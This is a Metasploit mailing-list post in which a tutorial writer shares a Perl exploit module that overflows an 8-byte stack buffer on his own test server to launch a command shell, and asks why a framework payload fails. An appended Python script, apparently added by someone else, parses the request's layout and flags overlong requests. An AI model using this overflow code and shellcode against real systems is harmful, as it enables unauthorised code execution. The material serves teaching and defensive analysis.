Metasploit mailing list archives

A small Windows problem


From: vmukhi at vsnl.com (Vijay Mukhi)
Date: Fri, 10 Jun 2005 17:12:41 +0530

I am writing a tutorial on MetaSploit at www.vijaymukhi.com. I have a tiny server listening on port 2000 at IP address
70.0.0.2. When I run the following exploit it overruns an 8-byte buffer on my server and opens a DOS box on the server.
Being a teacher I try and make my code as easy to understand as possible and hence have hard-coded the addresses;
0012ff8c is the address on the stack where my shell code starts.

package Msf::Exploit::z;
use strict;
use base "Msf::Exploit";
use Msf::Socket::Tcp;

my $info =
{
    'Payload' =>
    {
        'Space' => 1000,
    },
    'DefaultTarget' => 0,
    'Targets' => [
        ['Windows 2000 SP0-SP4'],
    ],
};

sub new
{
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info}, @_);
    return $self;
}

sub Exploit
{
    my $self = shift;
    my $shellcode = $self->GetVar('EncodedPayload')->Payload;

    my $s = Msf::Socket::Tcp->new('PeerAddr' => '70.0.0.2', 'PeerPort' => 2000);
    if ($s->IsError) {
        $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
        return;
    }

    # 12 filler bytes, then the hard-coded stack address 0012ff8c (little-endian),
    # then four zero bytes
    my $req = "AAAAAAAAAAAA" . "\x8c\xff\x12\x00" . "\x00\x00\x00\x00";
    # hand-written code that runs at 0012ff8c; these two lines are what gets
    # replaced by $shellcode when a framework payload is used instead
    $req .= "\x55\x8b\xec\x51\xc7\x45\xfc\x63\x6d\x64\x00\x6a\x05\x8b\xc5\x83\xe8\x04";
    $req .= "\x50\xb8\x1d\x9c\x4e\x7c\xff\xd0\x6a\x00\xb8\x1a\xe0\x4e\x7c\xff\xd0";
    $s->Send($req);
    return;
}

If I comment out the last two lines and replace them with

$req .= $shellcode;

I set the payload to win32_bin. When I now run the exploit I expect the system to open a DOS box on the machine that I
am running my exploit on and connect it to the target machine. Nothing happens. What am I doing wrong? Any help or
pointers would be highly appreciated.

Vijay Mukhi
Bombay India
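For readers following the tutorial, here is an added example (not the poster's code and not part of the Metasploit framework) that takes the request the module above sends, as it would appear in a capture of traffic to port 2000, and recovers its layout: the filler, the little-endian return address that lands on the saved return pointer, and the trailing code. The request bytes are reconstructed from the post; the split of the 12 filler bytes into the 8-byte buffer plus a 4-byte saved frame pointer is an assumption, as is the meaning of the four zero bytes after the address, which the post does not explain. The same parser is also useful on the defender's side, since a request to a service with an 8-byte buffer that is 55 bytes long is itself the signal.

```python
import struct

# Request bytes reconstructed from the posted module (a constructed capture,
# not real traffic): 12 filler bytes, the address 0012ff8c little-endian,
# four zero bytes, then the hand-written code from the post.
CAPTURED_REQUEST = (
    b"AAAAAAAAAAAA"
    + b"\x8c\xff\x12\x00"
    + b"\x00\x00\x00\x00"
    + b"\x55\x8b\xec\x51\xc7\x45\xfc\x63\x6d\x64\x00\x6a\x05\x8b\xc5\x83\xe8\x04"
    + b"\x50\xb8\x1d\x9c\x4e\x7c\xff\xd0\x6a\x00\xb8\x1a\xe0\x4e\x7c\xff\xd0"
)

BUFFER_SIZE = 8        # size of the server's stack buffer, as stated in the post
PAYLOAD_SPACE = 1000   # 'Space' value from the module's $info block
# Assumption: 12 filler bytes = 8-byte buffer + 4-byte saved frame pointer,
# so the next 4 bytes overwrite the saved return address.
FILLER_LEN = 12


def parse_overflow_request(data: bytes, filler_len: int = FILLER_LEN) -> dict:
    """Split a captured request into filler, overwritten return address,
    the four bytes that follow it, and the code that runs afterwards."""
    if len(data) < filler_len + 8:
        raise ValueError("request too short to overwrite a return address")
    filler = data[:filler_len]
    # x86 is little-endian, so "\x8c\xff\x12\x00" on the wire is 0x0012ff8c
    (ret_addr,) = struct.unpack("<I", data[filler_len:filler_len + 4])
    after_addr = data[filler_len + 4:filler_len + 8]
    code = data[filler_len + 8:]
    return {
        "filler_len": len(filler),
        "filler_is_uniform": len(set(filler)) == 1,
        "ret_addr": ret_addr,
        "after_addr": after_addr,
        "code_len": len(code),
        # NUL bytes matter if the server copies the request as a C string:
        # anything after the first 0x00 would never reach the stack.
        "code_has_nul": b"\x00" in code,
        "bytes_past_buffer": len(data) - BUFFER_SIZE,
    }


def fits_payload_space(code_len: int, space: int = PAYLOAD_SPACE) -> bool:
    """Check a payload length against the 'Space' the module advertises."""
    return code_len <= space


def exceeds_buffer(data: bytes, buffer_size: int = BUFFER_SIZE) -> bool:
    """Minimal detection rule: a request longer than the buffer overruns it."""
    return len(data) > buffer_size


if __name__ == "__main__":
    layout = parse_overflow_request(CAPTURED_REQUEST)
    print(f"request length      : {len(CAPTURED_REQUEST)} bytes")
    print(f"filler              : {layout['filler_len']} bytes, uniform={layout['filler_is_uniform']}")
    print(f"return address      : 0x{layout['ret_addr']:08x}")
    print(f"bytes after address : {layout['after_addr'].hex()}")
    print(f"trailing code       : {layout['code_len']} bytes, contains NUL={layout['code_has_nul']}")
    print(f"bytes past buffer   : {layout['bytes_past_buffer']}")
    print(f"fits Space=1000     : {fits_payload_space(layout['code_len'])}")
    print(f"exceeds 8-byte buf  : {exceeds_buffer(CAPTURED_REQUEST)}")
```

Running it on the reconstructed request reports a return address of 0x0012ff8c, which matches the stack address the post names, 35 bytes of trailing code that contain NUL bytes, and 47 bytes past the end of the 8-byte buffer. Swapping in a captured payload from a different module lets you see at a glance whether its length still fits the advertised Space and whether the filler length still lines up with the address you expect.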